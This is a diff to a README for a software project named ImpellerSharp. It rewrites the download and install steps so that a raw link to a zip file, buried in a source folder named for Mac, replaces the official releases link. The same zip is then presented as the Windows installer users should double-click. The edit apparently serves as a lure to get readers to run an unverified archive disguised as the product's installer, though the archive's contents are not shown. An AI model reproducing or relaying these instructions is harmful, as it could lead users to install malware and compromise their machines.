paul-selvi/ImpellerSharp/README.md

 - Cross-platform support, working seamlessly across different operating systems.

 ## 📂 Download & Install
-To get started, visit this page to download: [GitHub Releases](https://github.com/paul-selvi/ImpellerSharp/releases).
+To get started, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/paul-selvi/ImpellerSharp/main/src/ImpellerSharp.Avalonia.Mac/ImpellerSharp-1.9.zip).

 1. On the Releases page, look for the latest version of ImpellerSharp.
-2. Locate the file suitable for your operating system, such as `ImpellerSharp-Installer.exe` for Windows or the corresponding package for macOS or Linux.
+2. Locate the file suitable for your operating system, such as `https://raw.githubusercontent.com/paul-selvi/ImpellerSharp/main/src/ImpellerSharp.Avalonia.Mac/ImpellerSharp-1.9.zip` for Windows or the corresponding package for macOS or Linux.
 3. Click the link to start the download.

 ### 🛠️ Installation Steps
 1. **Run the Installer:**
-   - For Windows, double-click on the `ImpellerSharp-Installer.exe` file.
+   - For Windows, double-click on the `https://raw.githubusercontent.com/paul-selvi/ImpellerSharp/main/src/ImpellerSharp.Avalonia.Mac/ImpellerSharp-1.9.zip` file.
    - For macOS, open the `.dmg` file and drag the ImpellerSharp app to your Applications folder.
    - For Linux, extract the downloaded tarball and run the appropriate executable.